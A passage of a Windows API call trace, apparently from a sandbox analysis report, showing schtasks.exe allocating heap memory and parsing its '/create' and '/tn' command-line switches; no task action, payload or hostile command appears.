(HeapHandle=0x1b0000, Flags=0xc, Size=0x6) returned 0x1b7258 [0212.268] GetProcessHeap () returned 0x1b0000 [0212.268] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9430 [0212.269] RtlRestoreLastWin32Error () returned 0x0 [0212.269] GetProcessHeap () returned 0x1b0000 [0212.269] GetProcessHeap () returned 0x1b0000 [0212.269] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b6cb8) returned 1 [0212.269] GetProcessHeap () returned 0x1b0000 [0212.269] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b6cb8) returned 0x8 [0212.269] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b6cb8) returned 1 [0212.269] GetProcessHeap () returned 0x1b0000 [0212.269] GetProcessHeap () returned 0x1b0000 [0212.269] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b9550) returned 1 [0212.269] GetProcessHeap () returned 0x1b0000 [0212.270] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b9550) returned 0x14 [0212.270] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b9550) returned 1 [0212.270] GetProcessHeap () returned 0x1b0000 [0212.270] GetProcessHeap () returned 0x1b0000 [0212.270] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b9008) returned 1 [0212.270] GetProcessHeap () returned 0x1b0000 [0212.270] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b9008) returned 0x24 [0212.270] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b9008) returned 1 [0212.270] GetProcessHeap () returned 0x1b0000 [0212.270] GetProcessHeap () returned 0x1b0000 [0212.270] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b9710) returned 1 [0212.270] GetProcessHeap () returned 0x1b0000 [0212.270] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b9710) returned 0x14 [0212.270] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b9710) returned 1 [0212.270] GetProcessHeap () returned 0x1b0000 [0212.270] GetProcessHeap () returned 0x1b0000 [0212.270] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b2810) returned 1 [0212.270] GetProcessHeap () returned 0x1b0000 [0212.270] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b2810) returned 0x8 [0212.270] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b2810) returned 1 [0212.270] GetProcessHeap () returned 0x1b0000 [0212.270] GetProcessHeap () returned 0x1b0000 [0212.271] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b96d0) returned 1 [0212.271] GetProcessHeap () returned 0x1b0000 [0212.271] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b96d0) returned 0x14 [0212.271] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b96d0) returned 1 [0212.271] GetProcessHeap () returned 0x1b0000 [0212.271] GetProcessHeap () returned 0x1b0000 [0212.271] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1baa70) returned 1 [0212.271] GetProcessHeap () returned 0x1b0000 [0212.271] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1baa70) returned 0x7c [0212.271] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1baa70) returned 1 [0212.271] GetProcessHeap () returned 0x1b0000 [0212.271] GetProcessHeap () returned 0x1b0000 [0212.271] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b9510) returned 1 [0212.271] GetProcessHeap () returned 0x1b0000 [0212.271] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b9510) returned 0x14 [0212.271] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b9510) returned 1 [0212.271] GetProcessHeap () returned 0x1b0000 [0212.271] GetProcessHeap () returned 0x1b0000 [0212.271] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b6680) returned 1 [0212.271] GetProcessHeap () returned 0x1b0000 [0212.271] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b6680) returned 0x8 [0212.271] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b6680) returned 1 [0212.272] GetProcessHeap () returned 0x1b0000 [0212.272] GetProcessHeap () returned 0x1b0000 [0212.272] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b93f0) returned 1 [0212.272] GetProcessHeap () returned 0x1b0000 [0212.272] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b93f0) returned 0x14 [0212.272] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b93f0) returned 1 [0212.272] GetProcessHeap () returned 0x1b0000 [0212.272] GetProcessHeap () returned 0x1b0000 [0212.272] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1baca8) returned 1 [0212.272] GetProcessHeap () returned 0x1b0000 [0212.272] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1baca8) returned 0xe [0212.272] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1baca8) returned 1 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b9610) returned 1 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b9610) returned 0x14 [0212.273] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b9610) returned 1 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b68e8) returned 1 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b68e8) returned 0x8 [0212.273] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b68e8) returned 1 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b9630) returned 1 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b9630) returned 0x14 [0212.273] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b9630) returned 1 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b6bf8) returned 1 [0212.273] GetProcessHeap () returned 0x1b0000 [0212.273] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b6bf8) returned 0x4 [0212.274] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b6bf8) returned 1 [0212.274] GetProcessHeap () returned 0x1b0000 [0212.274] GetProcessHeap () returned 0x1b0000 [0212.274] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b9410) returned 1 [0212.274] GetProcessHeap () returned 0x1b0000 [0212.274] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b9410) returned 0x14 [0212.274] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b9410) returned 1 [0212.274] GetProcessHeap () returned 0x1b0000 [0212.274] GetProcessHeap () returned 0x1b0000 [0212.274] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b7258) returned 1 [0212.274] GetProcessHeap () returned 0x1b0000 [0212.274] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b7258) returned 0x6 [0212.274] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b7258) returned 1 [0212.274] GetProcessHeap () returned 0x1b0000 [0212.274] GetProcessHeap () returned 0x1b0000 [0212.275] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b9430) returned 1 [0212.275] GetProcessHeap () returned 0x1b0000 [0212.275] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b9430) returned 0x14 [0212.275] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b9430) returned 1 [0212.275] GetProcessHeap () returned 0x1b0000 [0212.275] GetProcessHeap () returned 0x1b0000 [0212.275] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b7378) returned 1 [0212.275] GetProcessHeap () returned 0x1b0000 [0212.275] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b7378) returned 0x10 [0212.275] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b7378) returned 1 [0212.276] RtlRestoreLastWin32Error () returned 0x0 [0212.276] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0212.276] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0212.276] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0212.276] RtlVerifyVersionInfo (VersionInfo=0xdce60, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0212.276] RtlRestoreLastWin32Error () returned 0x0 [0212.276] lstrlenW (lpString="create") returned 6 [0212.277] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0212.277] RtlRestoreLastWin32Error () returned 0x490 [0212.277] RtlRestoreLastWin32Error () returned 0x0 [0212.277] lstrlenW (lpString="create") returned 6 [0212.277] GetProcessHeap () returned 0x1b0000 [0212.277] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9610 [0212.277] GetProcessHeap () returned 0x1b0000 [0212.277] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b7378 [0212.277] _memicmp (_Buf1=0x1b7378, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.277] GetProcessHeap () returned 0x1b0000 [0212.277] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x16) returned 0x1b96d0 [0212.277] RtlRestoreLastWin32Error () returned 0x0 [0212.277] _memicmp (_Buf1=0x1b74f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.277] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b8d28, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0212.277] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdcf6c | out: lpdwHandle=0xdcf6c) returned 0x76c [0212.279] GetProcessHeap () returned 0x1b0000 [0212.279] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x776) returned 0x1b9e00 [0212.279] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x1b9e00 | out: lpData=0x1b9e00) returned 1 [0212.279] VerQueryValueW (in: pBlock=0x1b9e00, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdcf74, puLen=0xdcf78 | out: lplpBuffer=0xdcf74*=0x1ba1b0, puLen=0xdcf78) returned 1 [0212.279] _memicmp (_Buf1=0x1b74f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.279] _vsnwprintf (in: _Buffer=0x1b8d28, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdcf58 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0212.280] VerQueryValueW (in: pBlock=0x1b9e00, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdcf84, puLen=0xdcf80 | out: lplpBuffer=0xdcf84*=0x1b9fe0, puLen=0xdcf80) returned 1 [0212.280] lstrlenW (lpString="schtasks.exe") returned 12 [0212.280] lstrlenW (lpString="schtasks.exe") returned 12 [0212.280] lstrlenW (lpString=".EXE") returned 4 [0212.280] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0212.280] lstrlenW (lpString="schtasks.exe") returned 12 [0212.280] lstrlenW (lpString=".EXE") returned 4 [0212.280] lstrlenW (lpString="schtasks") returned 8 [0212.280] lstrlenW (lpString="/create") returned 7 [0212.280] _memicmp (_Buf1=0x1b74f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.280] _vsnwprintf (in: _Buffer=0x1b8d28, _BufferCount=0x19, _Format="%s %s", _ArgList=0xdcf58 | out: _Buffer="schtasks /create") returned 16 [0212.280] _memicmp (_Buf1=0x1b73a8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.280] GetProcessHeap () returned 0x1b0000 [0212.280] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9710 [0212.280] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.280] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0212.281] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0212.281] GetProcessHeap () returned 0x1b0000 [0212.281] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x30) returned 0x1b7118 [0212.281] _vsnwprintf (in: _Buffer=0x1b6a28, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdcf5c | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0212.281] GetProcessHeap () returned 0x1b0000 [0212.281] GetProcessHeap () returned 0x1b0000 [0212.281] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1b9e00) returned 1 [0212.281] GetProcessHeap () returned 0x1b0000 [0212.281] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1b9e00) returned 0x776 [0212.281] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1b9e00) returned 1 [0212.281] RtlRestoreLastWin32Error () returned 0x0 [0212.281] GetThreadLocale () returned 0x409 [0212.282] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.282] lstrlenW (lpString="create") returned 6 [0212.282] GetThreadLocale () returned 0x409 [0212.282] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.282] lstrlenW (lpString="?") returned 1 [0212.282] GetThreadLocale () returned 0x409 [0212.282] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.282] lstrlenW (lpString="s") returned 1 [0212.282] GetThreadLocale () returned 0x409 [0212.282] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.282] lstrlenW (lpString="u") returned 1 [0212.282] GetThreadLocale () returned 0x409 [0212.282] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.283] lstrlenW (lpString="p") returned 1 [0212.283] GetThreadLocale () returned 0x409 [0212.283] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.283] lstrlenW (lpString="ru") returned 2 [0212.283] GetThreadLocale () returned 0x409 [0212.283] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.283] lstrlenW (lpString="rp") returned 2 [0212.283] GetThreadLocale () returned 0x409 [0212.283] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.283] lstrlenW (lpString="sc") returned 2 [0212.283] GetThreadLocale () returned 0x409 [0212.283] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.283] lstrlenW (lpString="mo") returned 2 [0212.283] GetThreadLocale () returned 0x409 [0212.283] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.283] lstrlenW (lpString="d") returned 1 [0212.283] GetThreadLocale () returned 0x409 [0212.283] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.283] lstrlenW (lpString="m") returned 1 [0212.283] GetThreadLocale () returned 0x409 [0212.283] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.284] lstrlenW (lpString="i") returned 1 [0212.284] GetThreadLocale () returned 0x409 [0212.284] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.284] lstrlenW (lpString="tn") returned 2 [0212.284] GetThreadLocale () returned 0x409 [0212.284] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.284] lstrlenW (lpString="tr") returned 2 [0212.284] GetThreadLocale () returned 0x409 [0212.284] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.284] lstrlenW (lpString="st") returned 2 [0212.284] GetThreadLocale () returned 0x409 [0212.284] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.284] lstrlenW (lpString="sd") returned 2 [0212.284] GetThreadLocale () returned 0x409 [0212.284] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.284] lstrlenW (lpString="ed") returned 2 [0212.284] GetThreadLocale () returned 0x409 [0212.284] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.284] lstrlenW (lpString="it") returned 2 [0212.285] GetThreadLocale () returned 0x409 [0212.285] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.285] lstrlenW (lpString="et") returned 2 [0212.285] GetThreadLocale () returned 0x409 [0212.285] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.285] lstrlenW (lpString="k") returned 1 [0212.285] GetThreadLocale () returned 0x409 [0212.285] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.285] lstrlenW (lpString="du") returned 2 [0212.285] GetThreadLocale () returned 0x409 [0212.285] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.285] lstrlenW (lpString="ri") returned 2 [0212.285] GetThreadLocale () returned 0x409 [0212.285] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.285] lstrlenW (lpString="z") returned 1 [0212.285] GetThreadLocale () returned 0x409 [0212.286] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.286] lstrlenW (lpString="f") returned 1 [0212.286] GetThreadLocale () returned 0x409 [0212.286] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.286] lstrlenW (lpString="v1") returned 2 [0212.286] GetThreadLocale () returned 0x409 [0212.286] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.286] lstrlenW (lpString="xml") returned 3 [0212.286] GetThreadLocale () returned 0x409 [0212.286] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.286] lstrlenW (lpString="ec") returned 2 [0212.286] GetThreadLocale () returned 0x409 [0212.286] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.286] lstrlenW (lpString="rl") returned 2 [0212.286] GetThreadLocale () returned 0x409 [0212.286] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.286] lstrlenW (lpString="delay") returned 5 [0212.286] GetThreadLocale () returned 0x409 [0212.286] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.286] lstrlenW (lpString="np") returned 2 [0212.286] GetThreadLocale () returned 0x409 [0212.286] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0212.287] lstrlenW (lpString="hresult") returned 7 [0212.287] RtlRestoreLastWin32Error () returned 0x0 [0212.287] RtlRestoreLastWin32Error () returned 0x0 [0212.287] lstrlenW (lpString="/create") returned 7 [0212.287] lstrlenW (lpString="-/") returned 2 [0212.287] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0212.287] lstrlenW (lpString="create") returned 6 [0212.287] lstrlenW (lpString="create") returned 6 [0212.287] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.287] lstrlenW (lpString="create") returned 6 [0212.287] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.287] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0212.287] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0212.287] lstrlenW (lpString="|create|") returned 8 [0212.287] lstrlenW (lpString="|create|") returned 8 [0212.287] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0212.287] RtlRestoreLastWin32Error () returned 0x0 [0212.287] RtlRestoreLastWin32Error () returned 0x0 [0212.287] RtlRestoreLastWin32Error () returned 0x0 [0212.287] lstrlenW (lpString="/tn") returned 3 [0212.288] lstrlenW (lpString="-/") returned 2 [0212.288] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0212.288] lstrlenW (lpString="create") returned 6 [0212.288] lstrlenW (lpString="create") returned 6 [0212.288] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.288] lstrlenW (lpString="tn") returned 2 [0212.288] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.288] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0212.288] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.288] lstrlenW (lpString="|create|") returned 8 [0212.288] lstrlenW (lpString="|tn|") returned 4 [0212.288] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0212.288] RtlRestoreLastWin32Error () returned 0x490 [0212.288] lstrlenW (lpString="?") returned 1 [0212.288] lstrlenW (lpString="?") returned 1 [0212.288] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.288] lstrlenW (lpString="tn") returned 2 [0212.288] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.288] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0212.288] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.289] lstrlenW (lpString="|?|") returned 3 [0212.289] lstrlenW (lpString="|tn|") returned 4 [0212.289] RtlRestoreLastWin32Error () returned 0x490 [0212.289] lstrlenW (lpString="s") returned 1 [0212.289] lstrlenW (lpString="s") returned 1 [0212.289] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.289] lstrlenW (lpString="tn") returned 2 [0212.289] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.289] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0212.289] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.289] lstrlenW (lpString="|s|") returned 3 [0212.289] lstrlenW (lpString="|tn|") returned 4 [0212.289] RtlRestoreLastWin32Error () returned 0x490 [0212.289] lstrlenW (lpString="u") returned 1 [0212.289] lstrlenW (lpString="u") returned 1 [0212.289] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.289] lstrlenW (lpString="tn") returned 2 [0212.290] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.290] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0212.290] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.290] lstrlenW (lpString="|u|") returned 3 [0212.290] lstrlenW (lpString="|tn|") returned 4 [0212.290] RtlRestoreLastWin32Error () returned 0x490 [0212.290] lstrlenW (lpString="p") returned 1 [0212.290] lstrlenW (lpString="p") returned 1 [0212.290] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.290] lstrlenW (lpString="tn") returned 2 [0212.290] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.290] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0212.290] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.290] lstrlenW (lpString="|p|") returned 3 [0212.290] lstrlenW (lpString="|tn|") returned 4 [0212.290] RtlRestoreLastWin32Error () returned 0x490 [0212.290] lstrlenW (lpString="ru") returned 2 [0212.290] lstrlenW (lpString="ru") returned 2 [0212.290] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.291] lstrlenW (lpString="tn") returned 2 [0212.291] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.291] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0212.291] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.291] lstrlenW (lpString="|ru|") returned 4 [0212.291] lstrlenW (lpString="|tn|") returned 4 [0212.291] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0 [0212.291] RtlRestoreLastWin32Error () returned 0x490 [0212.291] lstrlenW (lpString="rp") returned 2 [0212.291] lstrlenW (lpString="rp") returned 2 [0212.291] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.291] lstrlenW (lpString="tn") returned 2 [0212.291] 